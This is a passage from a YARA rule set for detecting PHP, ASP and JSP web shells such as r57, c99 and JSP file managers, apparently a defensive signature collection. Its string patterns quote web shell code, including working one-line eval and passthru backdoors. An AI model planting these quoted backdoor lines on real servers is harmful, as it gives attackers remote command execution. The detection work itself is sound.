   		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"   
   		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"   
   		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"   
   		hash3 = "817671e1bdc85e04cc3440bbd9288800"   
   	strings:   
   		$s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword   
   		$s2 = "'eng_text30'=>'Cat file'," fullword   
   		$s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword   
   	condition:   
   		1 of them   
rule webshell_Dx_Dx {   
   	meta:   
   		description = "Web Shell - file Dx.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"   
   	strings:   
   		$s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"   
   		$s9 = "class=linelisting><nobr>POST (php eval)</td><"   
   	condition:   
   		1 of them   
rule webshell_jsp_zx {   
   	meta:   
   		description = "Web Shell - file zx.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "67627c264db1e54a4720bd6a64721674"   
   	strings:   
   		$s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"   
   	condition:   
   		all of them   
rule webshell_jsp_guige {   
   	meta:   
   		description = "Web Shell - file guige.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "2c9f2dafa06332957127e2c713aacdd2"   
   	strings:   
   		$s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"   
   	condition:   
   		all of them   
rule Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "49ad9117c96419c35987aaa7e2230f63"   
   	strings:   
   		$s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"   
   		$s1 = "Mode Shell v1.0</font></span>"   
   		$s2 = "has been already loaded. PHP Emperor <xb5@hotmail."   
   	condition:   
   		1 of them   
rule webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc {   
   	meta:   
   		description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "36331f2c81bad763528d0ae00edf55be"   
   		hash1 = "793b3d0a740dbf355df3e6f68b8217a4"   
   		hash2 = "8979594423b68489024447474d113894"   
   		hash3 = "ec482fc969d182e5440521c913bab9bd"   
   		hash4 = "f98d2b33cd777e160d1489afed96de39"   
   		hash5 = "4b4c12b3002fad88ca6346a873855209"   
   		hash6 = "e9a5280f77537e23da2545306f6a19ad"   
   		hash7 = "598eef7544935cf2139d1eada4375bb5"   
   	strings:   
   		$s0 = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword   
   		$s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword   
   		$s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword   
   		$s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword   
   	condition:   
   		2 of them   
rule shell_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file shell.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "1a95f0163b6dea771da1694de13a3d8d"   
   	strings:   
   		$s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword   
   		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');"   
   		$s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword   
   	condition:   
   		1 of them   
rule FSO_s_indexer_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file indexer.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "135fc50f85228691b401848caef3be9e"   
   	strings:   
   		$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"   
   	condition:   
   		all of them   
rule webshell_jsp_tree {   
   	meta:   
   		description = "Web Shell - file tree.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"   
   	strings:   
   		$s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki"   
   		$s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"   
   	condition:   
   		all of them   
rule webshell_mumaasp_com {   
   	meta:   
   		description = "Web Shell - file mumaasp.com.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "cce32b2e18f5357c85b6d20f564ebd5d"   
   	strings:   
   		$s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"   
   	condition:   
   		all of them   
rule webshell_webshells_new_asp1 {   
   	meta:   
   		description = "Web shells - generated from file asp1.asp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "b63e708cd58ae1ec85cf784060b69cad"   
   	strings:   
   		$s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword   
   		$s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword   
   	condition:   
   		1 of them   
rule WebShell_Uploader {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Uploader.php"   
   		author = "Florian Roth"   
   		hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"   
   	strings:   
   		$s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword   
   	condition:   
   		all of them   
rule asp_proxy : webshell {   
   	meta:   
   		description = "Laudanum Injector Tools - file proxy.asp"   
   		author = "Florian Roth"   
   		reference = "http://laudanum.inguardians.com/"   
   		date = "2015-06-22"   
   		hash = "51e97040d1737618b1775578a772fa6c5a31afd8"   
   	strings:   
   		$s1 = "'response.write \"<br/>  -value:\" & request.querystring(key)(j)" fullword ascii /* PEStudio Blacklist: strings */   
   		$s2 = "q = q & \"&\" & key & \"=\" & request.querystring(key)(j)" fullword ascii /* PEStudio Blacklist: strings */   
   		$s3 = "for each i in Split(http.getAllResponseHeaders, vbLf)" fullword ascii   
   		$s4 = "'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)" fullword ascii /* PEStudio Blacklist: strings */   
   		$s5 = "s = urlscheme & urlhost & urlport & urlpath" fullword ascii /* PEStudio Blacklist: strings */   
   		$s6 = "Set http = Server.CreateObject(\"Microsoft.XMLHTTP\")" fullword ascii /* PEStudio Blacklist: strings */   
   	condition:   
   		filesize < 50KB and all of them   
rule ZXshell2_0_rar_Folder_nc {   
   	meta:   
   		description = "Webshells Auto-generated - file nc.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "2cd1bf15ae84c5f6917ddb128827ae8b"   
   	strings:   
   		$s0 = "WSOCK32.dll"   
   		$s1 = "?bSUNKNOWNV"   
   		$s7 = "p@gram Jm6h)"   
   		$s8 = "ser32.dllCONFP@"   
   	condition:   
   		all of them   
rule phpspy_2005_full {   
   	meta:   
   		description = "Webshells Auto-generated - file phpspy_2005_full.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "d1c69bb152645438440e6c903bac16b2"   
   	strings:   
   		$s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"   
   	condition:   
   		all of them   
rule webshell_caidao_shell_hkmjj {   
   	meta:   
   		description = "Web Shell - file hkmjj.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "e7b994fe9f878154ca18b7cde91ad2d0"   
   	strings:   
   		$s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword   
   	condition:   
   		all of them   
rule backup_php_often_with_c99shell {   
   	meta:   
   		description = "Semi-Auto-generated  - file backup.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "aeee3bae226ad57baf4be8745c3f6094"   
   	strings:   
   		$s0 = "#phpMyAdmin MySQL-Dump" fullword   
   		$s2 = ";db_connect();header('Content-Type: application/octetstr"   
   		$s4 = "$data .= \"#Database: $database" fullword   
   	condition:   
   		all of them   
rule JspWebshell_1_2_jsp {   
   	meta:   
   		description = "Semi-Auto-generated  - file JspWebshell 1.2.jsp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "70a0ee2624e5bbe5525ccadc467519f6"   
   	strings:   
   		$s0 = "JspWebshell"   
   		$s1 = "CreateAndDeleteFolder is error:"   
   		$s2 = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c"   
   		$s3 = "String _password =\"111\";"   
   	condition:   
   		2 of them   
rule webshell_asp_ajn {   
   	meta:   
   		description = "Web Shell - file ajn.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "aaafafc5d286f0bff827a931f6378d04"   
   	strings:   
   		$s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword   
   		$s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"   
   	condition:   
   		all of them   
rule webshell_2_520_icesword_job_ma1_ma4_2 {   
   	meta:   
   		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "64a3bf9142b045b9062b204db39d4d57"   
   		hash1 = "9abd397c6498c41967b4dd327cf8b55a"   
   		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"   
   		hash3 = "56c005690da2558690c4aa305a31ad37"   
   		hash4 = "532b93e02cddfbb548ce5938fe2f5559"   
   		hash5 = "6e0fa491d620d4af4b67bae9162844ae"   
   		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"   
   	strings:   
   		$s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","   
   		$s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ"   
   		$s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"   
   	condition:   
   		all of them   
rule FSO_s_tool {   
   	meta:   
   		description = "Webshells Auto-generated - file tool.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "3a1e1e889fdd974a130a6a767b42655b"   
   	strings:   
   		$s7 = "\"\"%windir%\\\\calc.exe\"\")"   
   	condition:   
   		all of them   
rule remview_2003_04_22 {   
   	meta:   
   		description = "Webshells Auto-generated - file remview_2003_04_22.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "17d3e4e39fbca857344a7650f7ea55e3"   
   	strings:   
   		$s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\""   
   	condition:   
   		all of them   
rule Test_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Test.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "77e331abd03b6915c6c6c7fe999fcb50"   
   	strings:   
   		$s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword   
   		$s2 = "fwrite ($fp, \"$yazi\");" fullword   
   		$s3 = "$entry_line=\"HACKed by EntriKa\";" fullword   
   	condition:   
   		1 of them   
rule FeliksPack3___PHP_Shells_r57 {   
   	meta:   
   		description = "Webshells Auto-generated - file r57.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "903908b77a266b855262cdbce81c3f72"   
   	strings:   
   		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."   
   	condition:   
   		all of them   
rule WebShell_hiddens_shell_v1 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file hiddens shell v1.php"   
   		author = "Florian Roth"   
   		hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"   
   	strings:   
   		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"   
   	condition:   
   		all of them   
rule connector {   
   	meta:   
   		description = "Webshells Auto-generated - file connector.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "3ba1827fca7be37c8296cd60be9dc884"   
   	strings:   
   		$s2 = "If ( AttackID = BROADCAST_ATTACK )"   
   		$s4 = "Add UNIQUE ID for victims / zombies"   
   	condition:   
   		all of them   
rule fire2013 : webshell   
   {   
       meta:   
           author      = "Vlad https://github.com/vlad-s"   
           date        = "2016/07/18"   
           description = "Catches a webshell"   
       strings:   
           $a = "eval(\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61"   
           $b = "yc0CJYb+O//Xgj9/y+U/dd//vkf'\\x29\\x29\\x29\\x3B\")"   
       condition:   
           all of them   
rule WebShell_php_webshells_spygrup {   
   	meta:   
   		description = "PHP Webshells Github Archive - file spygrup.php"   
   		author = "Florian Roth"   
   		hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"   
   	strings:   
   		$s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword   
   		$s6 = "if($_POST['root']) $root = $_POST['root'];" fullword   
   		$s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword   
   		$s18 = "By KingDefacer From Spygrup.org>" fullword   
   	condition:   
   		3 of them   
rule HawkEye_PHP_Panel {   
   	meta:   
   		description = "Detects HawkEye Keyloggers PHP Panel"   
   		author = "Florian Roth"   
   		date = "2014/12/14"   
   		score = 60   
   	strings:   
   		$s0 = "$fname = $_GET['fname'];" ascii fullword   
   		$s1 = "$data = $_GET['data'];" ascii fullword   
   		$s2 = "unlink($fname);" ascii fullword   
   		$s3 = "echo \"Success\";" fullword ascii   
   	condition:   
   		all of ($s*) and filesize < 600   
rule webshell_404_data_in_JFolder_jfolder01_xxx {   
   	meta:   
   		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "7066f4469c3ec20f4890535b5f299122"   
   		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"   
   		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"   
   		hash3 = "8979594423b68489024447474d113894"   
   		hash4 = "ec482fc969d182e5440521c913bab9bd"   
   		hash5 = "f98d2b33cd777e160d1489afed96de39"   
   		hash6 = "4b4c12b3002fad88ca6346a873855209"   
   		hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"   
   		hash8 = "e9a5280f77537e23da2545306f6a19ad"   
   	strings:   
   		$s4 = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"   
   	condition:   
   		all of them   
rule webshell_c99_locus7s_c99_w4cking_xxx {   
   	meta:   
   		description = "Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"   
   		hash1 = "9c34adbc8fd8d908cbb341734830f971"   
   		hash2 = "ef43fef943e9df90ddb6257950b3538f"   
   		hash3 = "ae025c886fbe7f9ed159f49593674832"   
   		hash4 = "911195a9b7c010f61b66439d9048f400"   
   		hash5 = "697dae78c040150daff7db751fc0c03c"   
   		hash6 = "513b7be8bd0595c377283a7c87b44b2e"   
   		hash7 = "1d912c55b96e2efe8ca873d6040e3b30"   
   		hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"   
   		hash9 = "4108f28a9792b50d95f95b9e5314fa1e"   
   		hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"   
   		hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"   
   		hash12 = "41af6fd253648885c7ad2ed524e0692d"   
   		hash13 = "6fcc283470465eed4870bcc3e2d7f14d"   
   	strings:   
   		$s1 = "$res = @shell_exec($cfe);" fullword   
   		$s8 = "$res = @ob_get_contents();" fullword   
   		$s9 = "@exec($cfe,$res);" fullword   
   	condition:   
   		2 of them   
rule FSO_s_zehir4_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file zehir4.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "5b496a61363d304532bcf52ee21f5d55"   
   	strings:   
   		$s4 = "\"Program Files\\Serv-u\\Serv"   
   	condition:   
   		all of them   
rule FSO_s_RemExp_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file RemExp.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b69670ecdbb40012c73686cd22696eeb"   
   	strings:   
   		$s2 = " Then Response.Write \""   
   		$s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"   
   	condition:   
   		all of them   
rule WebShell_php_webshells_cw {   
   	meta:   
   		description = "PHP Webshells Github Archive - file cw.php"   
   		author = "Florian Roth"   
   		hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"   
   	strings:   
   		$s1 = "// Dump Database [pacucci.com]" fullword   
   		$s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword   
   		$s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword   
   		$s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"   
   		$s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword   
   		$s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword   
   	condition:   
   		3 of them   
rule uploader_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file uploader.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "0b53b67bb3b004a8681e1458dd1895d0"   
   	strings:   
   		$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword   
   		$s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword   
   		$s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword   
   	condition:   
   		2 of them   
rule WebShell_Generic_PHP_9 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"   
   		hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"   
   		hash2 = "0daed818cac548324ad0c5905476deef9523ad73"   
   	strings:   
   		$s2 = ":<b>\" .base64_decode($_POST['tot']). \"</b>\";" fullword   
   		$s6 = "if (isset($_POST['wq']) && $_POST['wq']<>\"\") {" fullword   
   		$s12 = "if (!empty($_POST['c'])){" fullword   
   		$s13 = "passthru($_POST['c']);" fullword   
   		$s16 = "<input type=\"radio\" name=\"tac\" value=\"1\">B64 Decode<br>" fullword   
   		$s20 = "<input type=\"radio\" name=\"tac\" value=\"3\">md5 Hash" fullword   
   	condition:   
   		3 of them   
rule Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "6163b30600f1e80d2bb5afaa753490b6"   
   	strings:   
   		$s0 = "Safe0ver" fullword   
   		$s1 = "Script Gecisi Tamamlayamadi!"   
   		$s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"   
   	condition:   
   		1 of them   
rule Release_dllTest {   
   	meta:   
   		description = "Webshells Auto-generated - file dllTest.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "76a59fc3242a2819307bb9d593bef2e0"   
   	strings:   
   		$s0 = ";;;Y;`;d;h;l;p;t;x;|;"   
   		$s1 = "0 0&00060K0R0X0f0l0q0w0"   
   		$s2 = ": :$:(:,:0:4:8:D:`=d="   
   		$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"   
   		$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"   
   		$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"   
   		$s6 = "0)0O0\\0a0o0\"1E1P1q1"   
   		$s7 = "<.<I<d<h<l<p<t<x<|<"   
   		$s8 = "3&31383>3F3Q3X3`3f3w3|3"   
   		$s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="   
   	condition:   
   		all of them   
rule webshell_000_403_c5_queryDong_spyjsp2010_t00ls {   
   	meta:   
   		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"   
   		hash1 = "059058a27a7b0059e2c2f007ad4675ef"   
   		hash2 = "8b457934da3821ba58b06a113e0d53d9"   
   		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"   
   		hash4 = "655722eaa6c646437c8ae93daac46ae0"   
   		hash5 = "9c94637f76e68487fa33f7b0030dd932"   
   	strings:   
   		$s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"   
   		$s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""   
   	condition:   
   		all of them   
rule WebShell_php_webshells_cpanel {   
   	meta:   
   		description = "PHP Webshells Github Archive - file cpanel.php"   
   		author = "Florian Roth"   
   		hash = "433dab17106b175c7cf73f4f094e835d453c0874"   
   	strings:   
   		$s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword   
   		$s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword   
   		$s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword   
   		$s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword   
   		$s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"   
   		$s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword   
   	condition:   
   		2 of them   
rule WebShell_Generic_PHP_4 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"   
   		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"   
   		hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"   
   		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"   
   		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"   
   	strings:   
   		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword   
   		$s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword   
   		$s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword   
   		$s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword   
   		$s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword   
   		$s10 = "foreach ($arr as $filename) {" fullword   
   		$s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword   
   	condition:   
   		all of them   
rule webshell_PHP_r57142 {   
   	meta:   
   		description = "Web Shell - file r57142.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"   
   	strings:   
   		$s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword   
   	condition:   
   		all of them   
rule php_backdoor_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file php-backdoor.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"   
   	strings:   
   		$s0 = "http://michaeldaw.org   2006"   
   		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"   
   		$s3 = "coded by z0mbie"   
   	condition:   
   		1 of them   
rule webshell_metaslsoft {   
   	meta:   
   		description = "Web Shell - file metaslsoft.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "aa328ed1476f4a10c0bcc2dde4461789"   
   	strings:   
   		$s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"   
   	condition:   
   		all of them   
rule PHANTASMA_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file PHANTASMA.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "52779a27fa377ae404761a7ce76a5da7"   
   	strings:   
   		$s0 = ">[*] Safemode Mode Run</DIV>"   
   		$s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"   
   		$s2 = "[*] Spawning Shell"   
   		$s3 = "Cha0s"   
   	condition:   
   		2 of them   
rule webshell_Macker_s_Private_PHPShell {   
   	meta:   
   		description = "Web Shell - file Macker's Private PHPShell.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "e24cbf0e294da9ac2117dc660d890bb9"   
   	strings:   
   		$s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n"   
   		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["   
   		$s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="   
   	condition:   
   		all of them   
rule multiple_webshells_0009 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "3ca5886cd54d495dc95793579611f59a"   
   		hash2 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"   
   		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"   
   		hash5 = "09609851caa129e40b0d56e90dfc476c"   
   	strings:   
   		$s0 = "$sess_data[\"cut\"] = array(); c99_s"   
   		$s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"   
   	condition:   
   		1 of them   
rule webshell_GetPostpHp {   
   	meta:   
   		description = "Web shells - generated from file GetPostpHp.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "20ede5b8182d952728d594e6f2bb5c76"   
   	strings:   
   		$s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword   
   	condition:   
   		all of them   
rule webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx {   
   	meta:   
   		description = "Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"   
   		hash1 = "ef43fef943e9df90ddb6257950b3538f"   
   		hash2 = "ae025c886fbe7f9ed159f49593674832"   
   		hash3 = "911195a9b7c010f61b66439d9048f400"   
   		hash4 = "697dae78c040150daff7db751fc0c03c"   
   		hash5 = "513b7be8bd0595c377283a7c87b44b2e"   
   		hash6 = "1d912c55b96e2efe8ca873d6040e3b30"   
   		hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"   
   		hash8 = "4108f28a9792b50d95f95b9e5314fa1e"   
   		hash9 = "41af6fd253648885c7ad2ed524e0692d"   
   		hash10 = "6fcc283470465eed4870bcc3e2d7f14d"   
   	strings:   
   		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"   
